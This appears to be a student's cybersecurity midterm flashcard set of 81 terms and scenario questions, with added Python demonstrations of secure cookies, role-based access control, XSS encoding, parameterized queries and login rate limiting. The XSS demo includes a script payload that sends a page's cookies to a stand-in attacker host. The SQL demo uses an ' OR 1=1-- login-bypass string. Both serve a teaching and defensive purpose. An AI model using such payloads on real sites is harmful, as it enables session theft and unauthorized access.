Cyber midterm

Last updated 10:31 PM on 3/5/25
81 Terms

1

Inventory Assessment

Inventory Assessment is the comprehensive process of identifying and evaluating all assets within an organization, including hardware, software, and data, to ensure adequate security management and regulatory compliance, providing visibility into potential vulnerabilities.

2

Vulnerability scanning

Vulnerability scanning is a systematic, largely automated process of identifying known security weaknesses in systems, applications, and network devices. Scanners such as Nessus or OpenVAS compare what they observe (open ports, service banners, installed package versions, configuration settings) against a database of known vulnerabilities, letting organizations find and fix weaknesses before attackers exploit them. Scan results still need triage: a scanner reports known issues only and can produce false positives.

3

Minimum configuration standards

Minimum configuration standards refer to established baseline security requirements that all systems and applications must meet. These standards ensure essential protective measures are implemented, such as antivirus software, firewalls, and secure configurations, to safeguard organizational assets.

4

Documentation

Documentation encompasses detailed and organized records that articulate the systems, security policies, procedures, and configurations within an organization. This is crucial for ensuring consistency, regulatory compliance, and effective communication in security practices.

5

Deployment

Deployment includes the procedure of installing, configuring, and activating software and associated security measures across various environments. This ensures that security controls are not only implemented but also operational to protect organizational assets.

6

Ongoing management

Ongoing management involves the continuous oversight and active maintenance of security measures and resources in an organization. This process is essential to respond to emerging threats and to maintain optimal performance of security infrastructures.

7

ICS/SCADA Firmware updates

ICS/SCADA firmware updates are the practice of applying vendor firmware releases to Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) devices such as PLCs, RTUs, and HMIs. Updates close known vulnerabilities and fix defects, but in ICS environments they are scheduled carefully (tested on a staging system, applied during maintenance windows) because a failed update on a controller can halt a physical process.

8

Embedded systems

Embedded systems are specialized computing systems integrated within larger systems to perform specific control functions. They often operate under real-time constraints and have particular security requirements, contributing to the efficiency of the systems they serve.

9

Real-time monitoring (and RTO)

Real-time monitoring is the continuous tracking of operations and security events so that a threat or incident can be acted on as it occurs, rather than discovered later from stored logs. Note that the abbreviation RTO conventionally stands for Recovery Time Objective, the maximum acceptable time to restore a service after a disruption; it is a business-continuity metric, not a synonym for real-time monitoring.

10

IoT Devices

IoT Devices, or Internet of Things devices, are interconnected devices that communicate over the Internet, allowing for remote monitoring and control. They present unique security challenges due to their variety and often minimal built-in security features.

11

Point-to-Multipoint Layout

A Point-to-Multipoint Layout is a specific network topology design where a central device communicates directly with multiple endpoints. This layout streamlines communication and data flow across the network, enhancing overall efficiency.

12

Mobile Device Management (MDM) security feature concerns

MDM stands for Mobile Device Management. MDM security feature concerns are the challenges of managing and securing many mobile devices within an organization: privacy of personal data on enrolled devices, leakage of corporate data to unmanaged apps or cloud services, and unauthorized access to sensitive information if a device is lost, stolen, or compromised.

13

Remote Wipe

A Remote Wipe is a critical security feature enabling the remote deletion of all data stored on a mobile device. This feature is predominantly utilized when devices are lost or stolen, protecting sensitive information from unauthorized access.

14

Geofencing

Geofencing is a technology that employs virtual boundaries around designated geographic areas, triggering alerts or automated actions when a device enters or exits these zones. This capability is widely used for location-based services and security applications.

15

Geolocation

Geolocation is the process of determining the physical location of a device in the real world. This technology underpins many applications, including geofencing and various location-based services, enhancing user experiences by providing relevant local information.

16

Screen locks

Screen locks are security mechanisms implemented on devices requiring users to input a password, PIN, or biometric information to unlock. This measure prevents unauthorized access and protects sensitive data on mobile devices.

17

BYOD (Bring Your Own Device)

BYOD, or Bring Your Own Device, is a policy that permits employees to utilize their personal devices, such as smartphones and laptops, for professional work. While it boosts flexibility and productivity, it also raises significant security concerns regarding data privacy and potential data loss.

18

CYOD (Choose Your Own Device)

CYOD, or Choose Your Own Device, is a policy allowing employees to select from a range of approved devices provided by the company for work purposes. This strategy aims to balance employee flexibility with enhanced security protocols.

19

COPE (Corporate-Owned, Personally Enabled)

COPE, or Corporate-Owned, Personally Enabled, is a device management approach in which the organization owns the device while permitting personal use. This strategy is designed to secure corporate data while allowing employees some flexibility in device usage.

20

Secure Cookies

Secure cookies are cookies set with attributes that restrict how the browser stores and sends them. The Secure flag means the cookie is only sent over HTTPS, never in clear text; HttpOnly means page scripts cannot read it through document.cookie, so a cross-site scripting bug cannot exfiltrate a session token; SameSite=Lax or Strict keeps the cookie off most cross-site requests, which limits cross-site request forgery. A bounded Max-Age or Expires limits how long a stolen cookie remains useful.
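As an added example (not code from the original flashcards), the following Python builds a session cookie with the attributes described above using the standard library, and includes a small audit function that reports which protections a given Set-Cookie header lacks. The helper names and the sample cookie values are constructed for illustration:

```python
import secrets
from http.cookies import SimpleCookie

# Illustrative helpers (assumed names, not a library API).


def new_session_token(nbytes: int = 32) -> str:
    """Unpredictable session identifier from the OS CSPRNG, so it cannot be guessed."""
    return secrets.token_urlsafe(nbytes)


def build_session_cookie(name: str, token: str, max_age: int = 3600) -> str:
    """Return a Set-Cookie header value carrying the token with hardened attributes."""
    jar = SimpleCookie()
    jar[name] = token
    morsel = jar[name]
    morsel["secure"] = True      # only sent over HTTPS, never in clear text
    morsel["httponly"] = True    # not readable via document.cookie, so XSS cannot steal it
    morsel["samesite"] = "Lax"   # withheld from cross-site POSTs, limiting CSRF
    morsel["path"] = "/"
    morsel["max-age"] = max_age  # bounded lifetime for a stolen cookie
    return morsel.OutputString()


def audit_set_cookie(header_value: str) -> list:
    """Parse a Set-Cookie value and list the protections it lacks (empty list = hardened)."""
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:                      # parts[0] is name=value
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax or Strict")
    return missing


if __name__ == "__main__":
    hardened = build_session_cookie("sid", new_session_token())
    print(hardened)
    print("missing on hardened cookie:", audit_set_cookie(hardened))
    # Constructed weak header: no flags at all.
    print("missing on weak cookie:", audit_set_cookie("sid=abc123; Path=/"))
```

Run against a real response, `audit_set_cookie` takes the value of one `Set-Cookie` header; SameSite=None is reported as missing on purpose, since it re-enables cross-site sending.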

21

Code Signing

Code signing is the practice of digitally signing software (installers, packages, firmware, scripts) with the developer's private key so that anyone holding the matching public key or certificate can verify two things: who published the code (authenticity) and that it has not been altered since signing (integrity). It does not prove the code is free of bugs or malice, only that it comes from the claimed signer unchanged; a stolen signing key defeats it.

22

Sandboxing

Sandboxing is a security strategy that isolates applications within a controlled environment (sandbox) to prevent them from interacting with the host system directly or accessing sensitive resources. This helps mitigate risks from potentially harmful applications.

23

Monitoring

Monitoring refers to the continuous observation and analysis of security events and system activities in real-time. This proactive approach is essential for detecting potential security incidents and facilitating timely responses.

24

SIEM tool (Security Information and Event Management)

A SIEM tool is a sophisticated software application that aggregates and analyzes security data across an entire IT environment. This aggregation helps identify security threats and facilitates appropriate responses, enhancing overall security posture.

25

IAAA (Identification, Authentication, Authorization, Accountability)

IAAA is an essential framework that encompasses the processes of identifying users, verifying their identities, granting access based on authorization, and holding users accountable for their actions within an information system.

26

MFA (Multifactor Authentication)

MFA, or Multifactor Authentication, requires users to present two or more pieces of evidence from different factor categories when logging in: something the user knows (a password or PIN), something the user has (a phone, hardware token, or smart card), or something the user is (a fingerprint or face). Two items from the same category, such as a password plus a security question, do not count as multifactor. MFA greatly reduces the damage from a stolen password, though phishing-resistant methods (FIDO2/WebAuthn keys) are stronger than SMS codes, which can be intercepted or SIM-swapped.

27

RBAC (Role-Based Access Control)

RBAC, or Role-Based Access Control, is a security strategy that limits system access to authorized users based on their defined roles within the organization. This approach minimizes the risk of unauthorized access and data breaches.

28

Least Privilege Principle

The Least Privilege Principle is a foundational concept in cybersecurity that mandates users be granted only the minimum access necessary to perform their job functions. This principle limits exposure to potential risks and the impact of security incidents.
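As an added example covering both the RBAC and least-privilege cards (this is illustrative code, not from the original flashcards), the following Python shows a deny-by-default role check that records every decision for accountability, plus a provisioning helper that picks the role combination granting the fewest permissions while still covering what a job actually needs. The role model and names are constructed:

```python
from dataclasses import dataclass
from itertools import combinations
from typing import Optional, Set, Tuple

# Constructed role model (illustrative): role -> set of (action, resource) grants.
ROLE_PERMISSIONS = {
    "analyst": {("read", "report")},
    "editor":  {("read", "report"), ("write", "report")},
    "admin":   {("read", "report"), ("write", "report"),
                ("delete", "report"), ("manage", "user")},
}

Permission = Tuple[str, str]


@dataclass(frozen=True)
class Principal:
    name: str
    roles: frozenset  # roles assigned to this user


# Accountability: every authorization decision is recorded (who, action, resource, outcome).
AUDIT_LOG = []


def is_authorized(principal: Principal, action: str, resource: str) -> bool:
    """Deny by default: allow only when an assigned role explicitly grants (action, resource).
    An unknown role name grants nothing, so a typo in provisioning fails closed."""
    allowed = any((action, resource) in ROLE_PERMISSIONS.get(role, set())
                  for role in principal.roles)
    AUDIT_LOG.append((principal.name, action, resource, "ALLOW" if allowed else "DENY"))
    return allowed


def minimal_role_set(needed: Set[Permission]) -> Optional[Set[str]]:
    """Least privilege at provisioning time: the role combination that covers every needed
    permission while granting the fewest permissions overall. None if nothing covers it."""
    roles = list(ROLE_PERMISSIONS)
    best = None  # (role set, permissions granted by that set)
    for size in range(1, len(roles) + 1):
        for combo in combinations(roles, size):
            granted = set().union(*(ROLE_PERMISSIONS[r] for r in combo))
            if needed <= granted and (best is None or len(granted) < len(best[1])):
                best = (set(combo), granted)
    return best[0] if best else None


if __name__ == "__main__":
    ana = Principal("ana", frozenset({"analyst"}))
    print("ana read report:", is_authorized(ana, "read", "report"))     # True
    print("ana delete report:", is_authorized(ana, "delete", "report")) # False
    print("roles for a report writer:", minimal_role_set({("write", "report")}))
    print(AUDIT_LOG)
```

The provisioning helper is exhaustive over role combinations, which is fine for the handful of roles a small system has; it exists to show that "give the user admin because it works" is exactly what least privilege forbids.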

29

Nonrepudiation

Nonrepudiation is a crucial security principle that ensures a sender cannot deny having sent a message, nor can the recipient deny receiving it. This is commonly achieved through mechanisms such as digital signatures that establish a verifiable record of transactions.

30

Mirror Access

Mirror Access refers to a contingency method for providing access to a backup or replicated system immediately following the failure of a primary system. This process enhances availability and ensures redundancy in critical operational environments.

31

Phishing

Phishing is a deceptive cyber attack technique aimed at tricking individuals into divulging sensitive information, such as passwords or credit card details, typically through fraudulent emails or counterfeit websites.

32

Brute Force Attacks

Brute force attacks recover a password or cryptographic key by systematically trying candidate values (every possible combination, or, in a dictionary attack, a list of likely passwords) until one works. The cost grows exponentially with length and character set, so the attack succeeds against short or common passwords, against systems that allow unlimited login attempts, and against password hashes stored with fast unsalted algorithms; long passphrases, slow salted hashing, rate limiting, and account lockout defeat it.

33

Session Hijacking

Session hijacking is an attack in which an unauthorized party takes over a user's active, already-authenticated session by obtaining its session token (typically a cookie), without ever learning the password. Tokens are stolen through cross-site scripting, sniffing of unencrypted traffic, malware on the client, or prediction of weakly generated token values; because the server trusts the token, the attacker bypasses authentication entirely.

34

Privilege Escalation

Privilege escalation is an attack in which an adversary who already has some access gains more than intended, usually by exploiting a software flaw or misconfiguration. Vertical escalation moves to a higher privilege level (ordinary user to administrator or root); horizontal escalation reaches another user's data or account at the same level. It is commonly the step that turns a minor foothold into a full compromise.

35

Zero-Day Exploits

Zero-day exploits are attacks that use a vulnerability the vendor does not yet know about or has not yet patched, so there are "zero days" of warning and no fix available at the time of the attack. Because signature-based defenses and patching cannot help until the flaw is disclosed and fixed, defenses rely on reducing attack surface, least privilege, sandboxing, and behavior-based detection.

36

Write, Input, Encoding, Use

Write, Input, Encoding, Use summarizes secure-coding practice for handling untrusted data: write code that treats all input as untrusted, validate input against what is expected, encode or parameterize data for the context in which it is used (SQL parameters, HTML entity encoding, URL encoding), and only then use it. Following this prevents injection classes such as SQL injection and cross-site scripting.

37

SQL Injection (SQLI)

SQL Injection (SQLI) is a vulnerability that arises when user-supplied input is concatenated into a SQL query string, so that the input can change the structure of the query rather than just supplying a value. Attackers use it to bypass logins, read or modify data they are not authorized to see, and sometimes execute commands on the database server. The fix is to keep data separate from code with parameterized queries (prepared statements).

38

Cross-site Scripting (XSS)

Cross-site Scripting (XSS) is a vulnerability that lets an attacker inject script into web pages that other users' browsers then execute as if it came from the site. It arises when untrusted input is written into HTML, attributes, or JavaScript without encoding for that context. Consequences include theft of session cookies (hence session hijacking), actions performed as the victim, and delivery of malware. Defenses are context-aware output encoding, HttpOnly cookies, and a Content Security Policy.
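As an added example for the XSS and "Write, Input, Encoding, Use" cards (illustrative Python, not code from the original flashcards), the following shows a template that reflects input raw beside two correctly encoded versions, one for element-body context and one for a URL inside an attribute. The attacker payloads are constructed for the demonstration:

```python
import html
from urllib.parse import quote

# Constructed attacker inputs (illustrative).
SCRIPT_PAYLOAD = '<script>new Image().src="http://evil.example/c?"+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'   # tries to break out of a quoted attribute


def render_comment_vulnerable(author: str) -> str:
    """Untrusted input dropped straight into HTML: the browser runs any script it contains."""
    return f"<p>Posted by {author}</p>"


def render_comment_safe(author: str) -> str:
    """Element-body context: entity-encode so < > & \" ' are displayed, not interpreted."""
    return f"<p>Posted by {html.escape(author, quote=True)}</p>"


def render_profile_link_safe(username: str) -> str:
    """URL-in-attribute context needs two layers: percent-encode the query value so it cannot
    alter the URL, then entity-encode the whole attribute so it cannot close the quotes."""
    href = "/profile?u=" + quote(username, safe="")
    label = html.escape(username, quote=True)
    return f'<a href="{html.escape(href, quote=True)}">{label}</a>'


def has_script_tag(markup: str) -> bool:
    """Does a live <script> tag survive in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(SCRIPT_PAYLOAD))  # script tag intact: XSS
    print(render_comment_safe(SCRIPT_PAYLOAD))        # &lt;script&gt;... shown as text
    print(render_profile_link_safe(ATTR_PAYLOAD))     # attribute quotes stay balanced
```

Encoding is applied at output time for the specific context; input validation alone is not enough, because a legitimate comment may contain a `<` and the correct treatment depends on where the data lands.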

39

Web Application Firewall (WAF)

A Web Application Firewall (WAF) serves as a protective layer designed to filter and monitor HTTP traffic directed at web applications. Its primary purpose is to block common attacks such as SQL injection and cross-site scripting, safeguarding application integrity.

40

Application Sandboxing

Application Sandboxing is a security technique that isolates applications in a controlled environment (sandbox), reducing the risk of those applications affecting the host system or accessing sensitive resources. This is particularly useful for testing untrusted software.

41

Patch management

Patch management involves a systematic strategy for managing software updates, including the timely application of patches to fix vulnerabilities, enhance functionality, and ensure systems remain secure against evolving threats.

42

Denial-of-Service (DoS) & Distributed DoS (DDoS)

Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks make a service unavailable to legitimate users by exhausting its bandwidth, connections, or processing capacity, either through sheer traffic volume or through requests that are expensive to handle. A DoS attack comes from a single source and can often be blocked by address; a DDoS attack is launched from many compromised systems (a botnet) at once, which makes the traffic far larger and much harder to filter by source.

43

Rate limiting & Firewalls

Rate limiting is a security technique that controls the number of requests a user can make to a service within a certain timeframe. This method is often complemented by firewalls, which block unauthorized access and monitor network traffic for suspicious activities.

44

Mobile device management (MDM)

Mobile Device Management (MDM) encompasses software solutions designed to secure, manage, and enforce security policies across mobile devices used within an organization. This protects corporate data and maintains compliance with data protection regulations.

45

Endpoint detection and response (EDR)

Endpoint Detection and Response (EDR) is a class of security tooling that runs an agent on endpoints such as laptops, servers, and smartphones, continuously records activity (process starts, file and registry changes, network connections), and uses that telemetry to detect threats and support investigation. EDR also provides response actions, such as isolating a host from the network or killing a process, to contain an incident quickly.

46

Extended detection and response (XDR)

Extended Detection and Response (XDR) is an advanced security strategy that integrates data from a variety of sources, such as networks, endpoints, and servers, enabling a coordinated and comprehensive approach to threat detection and response.

47

Security teams must Detect, Contain, and Mitigate threats quickly

Security teams are tasked with essential actions that involve swiftly identifying potential threats, containing them to prevent further spread, and implementing mitigative measures to neutralize any security incidents effectively.

48

Penetration Testing

Penetration Testing involves simulating a cyber attack on a system or network to assess its security posture, detect vulnerabilities, and evaluate the effectiveness of existing security controls, thereby enhancing overall security.

49

Intrusion Detection Systems (IDS)

Intrusion Detection Systems (IDS) are tools or software solutions that monitor network traffic for signs of suspicious activities, generating alerts to inform security personnel about potential breaches or security incidents.

50

Plan of Action & Milestones (POAM)

The Plan of Action & Milestones (POAM) is a management document that outlines specific security weaknesses, details corrective actions required, and sets deadlines for their implementation to enhance security posture.

51

NIST Cybersecurity Framework (NIST CSF)

The NIST Cybersecurity Framework (NIST CSF) is a voluntarily adopted framework that provides organizations with structured guidelines to manage and improve their cybersecurity risk management practices effectively.

52

ISO 27001

ISO 27001 is an internationally recognized standard specifying requirements for establishing, implementing, maintaining, and continuously improving an Information Security Management System (ISMS), ensuring information security is effectively managed.

53

Risk Matrix

A Risk Matrix is a strategic tool utilized to visually categorize and prioritize risks based on their potential likelihood of occurrence and the possible impact they could have on organizational operations.

54

Gap Analysis

Gap Analysis is the method of assessing current security measures against desired standards or best practices, enabling organizations to identify existing deficiencies and areas requiring improvement for enhanced security.

55

VirtualBox

VirtualBox is a free and open-source virtualization software that enables users to run multiple operating systems concurrently on a single physical machine. This allows for flexibility in testing and development environments.

56

Client

In the context of computing, a Client refers to the end-user device, such as a personal computer or smartphone, that connects to and interacts with remote services or applications, facilitating user access to resources.

57

A company requires employees to log in with a password and a one-time code sent to their mobile phone. What authentication method is this?

This scenario exemplifies Multifactor Authentication (MFA), which combines two authentication factors: something the user knows (their password) and something they possess (the one-time code sent to their phone) for enhanced security.

58

A financial services company wants to ensure that only authorized employees can access financial records. Employees must enter a username and password and then a one-time password (OTP) sent to their phone. Which IAM component is this?

This is the Authentication component of Identity and Access Management (IAM): the username identifies the user, and the password plus the OTP verify that identity with two factors before any access decision (authorization) is made.

59

A hacker steals a session token from a user and gains access to their banking website without knowing the password. What attack is this?

This incident is categorized as Session Hijacking, where an unauthorized individual exploits a valid session token to gain illicit access to a user’s online account.

60

A hacker discovers a previously unknown vulnerability in a popular web browser and launches an attack before the developer releases a fix. What is this?

This situation exemplifies a Zero-Day Exploit, where an attacker takes advantage of an unpatched security vulnerability before the software developers are aware or able to provide a fix.

61

Which method is the best defense against SQL Injection?

The best defense against SQL injection is to use parameterized queries (prepared statements) so that user input is passed to the database as bound values rather than spliced into the SQL text; the query structure is fixed before the data arrives, so input cannot change it. Input validation, least-privilege database accounts, and a WAF are useful additional layers but are not substitutes.

62

A company's web app allows users to log in using a username and password. The hacker inputs ' OR 1=1-- in the username field and gains unauthorized access. What did they use?

The hacker used SQL injection (SQLI). The application concatenated the input into its query, so the single quote closed the username string, OR 1=1 made the WHERE clause true for every row, and -- commented out the password check that followed.
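As an added example for the SQL injection cards (card 37, the defense question, and the ' OR 1=1-- scenario above), the following Python reproduces the login bypass against an in-memory SQLite database and shows the parameterized version rejecting the same input. This is illustrative code, not from the original flashcards; the table, the user record, and the function names are constructed:

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table. Demo only: production stores passwords with a
    slow, salted hash such as bcrypt or argon2, not plain SHA-256."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("alice", hashlib.sha256(b"correct horse").hexdigest()))
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the query by string formatting: the input becomes part of the SQL grammar."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{pw_hash}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterized query: the statement is parsed first, values are bound afterwards,
    so the input can only ever be compared as data."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


# The payload from the flashcard scenario.
PAYLOAD = "' OR 1=1--"

if __name__ == "__main__":
    db = make_db()
    # Vulnerable query becomes: ... WHERE username = '' OR 1=1--' AND password_hash = '...'
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, "wrong"))  # alice
    print("safe login with payload:", login_safe(db, PAYLOAD, "wrong"))              # None
    print("safe login, real credentials:", login_safe(db, "alice", "correct horse"))  # alice
```

The vulnerable version returns the first user in the table because the WHERE clause is always true and the password comparison has been commented out; the safe version looks for a user literally named `' OR 1=1--` and finds none.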

63

A company’s website is under attack by automated bots trying to inject malicious SQL queries. What security tool can help?

To fend off such automated attacks, a Web Application Firewall (WAF) can be deployed to filter and monitor HTTP requests, enhancing the security of web applications.

64

What is the main difference between EDR and XDR?

The primary distinction between EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response) is that EDR focuses specifically on endpoint security, while XDR offers a comprehensive approach by integrating data across various security layers, including networks and servers.

65

A company provides employees with corporate smartphones but wants to ensure they can remotely wipe data if the device is lost or stolen. What feature is this?

This capability is characterized by the Remote Wipe feature, which empowers IT departments to erase all data remotely from a device to protect sensitive corporate information.

66

A financial services company is about to launch a new online banking system. To ensure no security vulnerabilities exist, they hire ethical hackers to try exploiting the system's defenses. What security practice is being conducted?

This process is known as Penetration Testing, wherein security professionals simulate cyber attacks to identify vulnerabilities and assess the resilience of the system's defenses prior to its launch.

67

A company creates a document listing security weaknesses and assigns deadlines for fixing them. What is this document called?

This document is referred to as a Plan of Action and Milestones (POAM), outlining identified security weaknesses, proposed corrective actions, and projected timelines for remediation.

68

A security team identifies all critical digital assets before implementing controls. Which NIST CSF function does this align with?

This activity aligns with the 'Identify' function of the NIST Cybersecurity Framework, which emphasizes understanding and managing organizational assets for effective security controls.

69

A retail company follows the NIST CSF to improve its cybersecurity strategy. The first step they take is to identify all digital assets including databases, servers, and customer records. Which function are they performing?

They are engaged in the 'Identify' function of the NIST Cybersecurity Framework, which is focused on recognizing and understanding the assets that require protection.

70

A company compares its existing security controls against the ISO 27001 requirements to find missing security measures. What process is this?

This process is called Gap Analysis, through which an organization evaluates its current security implementations against established standards to identify areas needing improvement.

71

A software developer needs to test an app on 3 OS with one computer. What is the best solution?

The ideal solution is to utilize Virtualization software, such as VirtualBox, allowing the developer to run multiple operating systems simultaneously on a single physical machine.

72

A Linux user wants to view the last 20 lines of a log file named error.log, but they do not want to edit the file. Which command should they use?

The user should execute the command tail -n 20 error.log to display the last 20 lines of the log file without modifying it.

73

A system admin wants to organize project files and needs to create a directory called 'project x' inside /var/www/html and then move that directory somewhere else. What commands should they use?

Create it with mkdir and move it with mv. Because the requested name contains a space, it must be quoted or the shell will treat it as two arguments: mkdir '/var/www/html/project x' and then mv '/var/www/html/project x' /path/to/target/directory. Most admins avoid the space altogether (mkdir /var/www/html/project_x followed by mv /var/www/html/project_x /path/to/target/directory). Note the leading slash: var/www/html is a path relative to the current directory, while /var/www/html is the absolute path the question intends.

74

A user is experiencing network issues and wants to check if their computer can reach google.com. Which command should they use?

The user should run ping google.com, which resolves the name and sends ICMP echo requests to the resulting address, reporting replies and round-trip time. If the name fails to resolve, the problem is DNS rather than connectivity; if there are no replies, keep in mind that some networks and hosts block ICMP, so a failed ping does not by itself prove the host is unreachable.

75

A system admin wants to install a package called 'They Not Like Us' on an Ubuntu system. Which command should they use?

The general form is sudo apt install <package-name>, for example sudo apt install nginx. Debian and Ubuntu package names are lowercase and contain no spaces (only letters, digits, +, - and .), so a name like 'They Not Like Us' cannot be a real package: quoting it, as in sudo apt install 'They Not Like Us', only passes that literal string, which apt will report as not found. Find the actual package name first with apt search or apt-cache search, then install it.

76

A developer has a text file and they want to be able to execute the text file. Which command should they use to change permissions?

The developer should run chmod +x filename, which adds the execute permission bit for the owner, group, and others (chmod u+x filename limits it to the owner). For a script to actually run, its first line should also be a shebang such as #!/bin/sh naming the interpreter.

77

A security researcher is testing malware in a VM and wants to quickly revert to a clean state after running the malware. Which VirtualBox feature should they use?

In this case, the researcher should leverage the Snapshot feature in VirtualBox, allowing them to restore the VM to a clean state quickly after malware testing.

78

A company wants to reduce hardware costs by running multiple independent environments on a single high-performance server. What benefit of virtualization addresses this need?

Virtualization addresses this need by providing resource efficiency, enabling multiple virtual machines to co-exist on a single physical server, which reduces overall hardware expenditures.

79

A company notices hundreds of failed login attempts on an admin account within a short time. Which security measure would be most effective in preventing this attack?

Rate limiting on the login endpoint (often combined with a temporary account lockout or progressive back-off after a set number of failures) is the most effective measure, because it removes the attacker's ability to try passwords quickly and turns a brute force attack into an impractical one. MFA on the admin account limits the damage even if a password is eventually guessed, and the failed-attempt spike itself should raise an alert.
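As an added example for the brute force, rate limiting, and failed-login scenario cards (illustrative Python, not from the original flashcards), the following implements a sliding-window rate limiter and runs it over constructed syslog-style authentication lines to show where a lockout would trigger. The log lines, hostnames, and addresses are made up for the demonstration:

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth log (illustrative): six failures from one source within six seconds,
# then an unrelated failure from a second source, then a success.
AUTH_LOG = """\
Mar 05 22:31:01 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51234 ssh2
Mar 05 22:31:02 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51235 ssh2
Mar 05 22:31:03 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51236 ssh2
Mar 05 22:31:04 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51237 ssh2
Mar 05 22:31:05 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51238 ssh2
Mar 05 22:31:06 web1 sshd[1203]: Failed password for admin from 203.0.113.7 port 51239 ssh2
Mar 05 22:31:07 web1 sshd[1204]: Failed password for invalid user test from 198.51.100.9 port 40000 ssh2
Mar 05 22:31:08 web1 sshd[1203]: Accepted password for admin from 203.0.113.7 port 51240 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")


def parse_ts(line: str) -> float:
    """Seconds from a fixed epoch for the 15-character syslog timestamp (year is absent)."""
    stamp = datetime.strptime(line[:15], "%b %d %H:%M:%S")
    return (stamp - datetime(1900, 1, 1)).total_seconds()


class SlidingWindowLimiter:
    """Allow at most `max_events` per key within any `window_seconds`-long window."""

    def __init__(self, max_events: int, window_seconds: float):
        self.max_events = max_events
        self.window = window_seconds
        self.events = defaultdict(deque)  # key -> timestamps still inside the window

    def allow(self, key: str, now: float) -> bool:
        q = self.events[key]
        while q and q[0] <= now - self.window:   # drop events that aged out
            q.popleft()
        q.append(now)
        return len(q) <= self.max_events


def find_bruteforce(log_text: str, max_failures: int = 5, window_seconds: float = 60) -> dict:
    """Replay failed logins through the limiter; return source -> number of attempts that
    exceeded the limit (where a lockout or block would have fired)."""
    limiter = SlidingWindowLimiter(max_failures, window_seconds)
    blocked = defaultdict(int)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if not m:
            continue                              # successes and other lines are not counted
        _user, source = m.groups()
        if not limiter.allow(source, parse_ts(line)):
            blocked[source] += 1
    return dict(blocked)


if __name__ == "__main__":
    print(find_bruteforce(AUTH_LOG))              # {'203.0.113.7': 1}
```

Keying by source address stops one attacker; a real deployment also keys by target account, since credential-stuffing attacks spread attempts across many addresses.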

80

What does LAMP in LAMP Stack stand for?

LAMP stands for Linux (operating system), Apache (web server), MySQL (database; MariaDB is a common drop-in), and PHP (server-side language; the P is sometimes Perl or Python), an open-source stack widely used for web applications.

81

A user modifies their smartphone OS to remove security restrictions, allowing them to install unauthorized third-party applications. What is this practice called?

This practice is referred to as Jailbreaking (for iOS) or Rooting (for Android), wherein users remove manufacturer-imposed security restrictions to gain additional control over their devices.
